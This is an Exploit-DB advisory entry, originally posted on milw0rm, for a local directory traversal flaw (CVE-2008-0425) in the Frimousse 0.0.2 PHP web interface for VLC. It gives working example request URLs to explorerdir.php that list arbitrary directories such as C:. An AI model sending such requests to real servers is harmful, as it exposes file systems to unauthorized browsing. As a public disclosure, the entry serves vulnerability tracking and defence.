Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2008-01-19 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-40958;CVE-2008-0425 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comFrimousse_0.0.2_setup.exe

software : Frimousse v.0.0.2
vendor : http://frimousseweb.free.fr/

[+] Introduction
Frimousse is a freeplayer interface web written in php language , works with apache & php & VLC ( media player ) .
it is used for manage the playlist and view it in interface web with VLC media player .
Frimousse runs on Linux and  Microsoft Windows.

 apache & php & VLC are integred in setup of version for windows and attched with php archive for linux :

Frimousse 0.0.2 setup.exe   > http://frimousseweb.free.fr/files/Frimousse_0.0.2_setup.exe
Frimousse 0.0.2 minimal.rar  > http://frimousseweb.free.fr/files/Frimousse_0.0.2_minimal_install.rar

[+] vulnerability discovered by : Houssamix  from H-T Team
H-T Team = HouSSaMix + ToXiC350 + RxH

[+] vulnerable version : Frimousse v.0.0.2

{ BUG } : directory traversals  :

   => xpl > http://127.0.0.1:8080/explorerdir.php?name=[directory]
   => ex > http://127.0.0.1:8080/explorerdir.php?name=C:
             http://127.0.0.1:8080/explorerdir.php?name=C:\Program Files

------------------------------------------------------------------------------------------
-  H-T Team  -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims   --
------------------------------------------------------------------------------------------

# milw0rm.com [2008-01-20]